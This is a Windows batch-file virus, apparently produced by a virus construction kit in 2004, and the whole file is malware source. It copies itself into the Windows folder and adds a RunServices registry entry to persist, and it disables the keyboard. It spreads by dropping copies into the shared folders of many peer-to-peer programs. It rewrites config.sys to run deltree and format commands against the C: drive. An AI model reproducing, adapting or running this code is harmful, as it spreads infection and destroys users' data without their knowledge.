::
:: Generated by Batch Virus Construction Kit 0.6 [DvL]-[rRLF]
:: Created by DvL on 01-03-2004 at 07:50:00
::
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\ojilamhq.bat>nul
echo.REGEDIT4>%windir%\ojilamhq.reg
echo.[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]>>%windir%\ojilamhq.reg
echo."ojilamhq"="%windir%\ojilamhq.bat">>%windir%\ojilamhq.reg
regedit /s %windir%\ojilamhq.reg
rundll32 keyboard,disable
copy %0 c:\kazaa\myshar~1\klb.bat>nul
copy %0 c:\mydown~1\klb.bat>nul
copy %0 c:\mydocu~1\klb.bat>nul
copy %0 c:\eigene~1\klb.bat>nul
copy %0 c:\progra~1\applej~1\incoming\klb.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\klb.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\klb.bat>nul
copy %0 c:\progra~1\emule\incoming\klb.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\klb.bat>nul
copy %0 c:\progra~1\icq\shared~1\klb.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\klb.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\klb.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\klb.bat>nul
copy %0 c:\progra~1\limewire\shared\klb.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\klb.bat>nul
copy %0 c:\progra~1\overnet\bundles\klb.bat>nul
echo.[menu]>c:\config.sys
echo.menuitem=l>>c:\config.sys
echo.>>c:\config.sys
echo.[l]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
cls
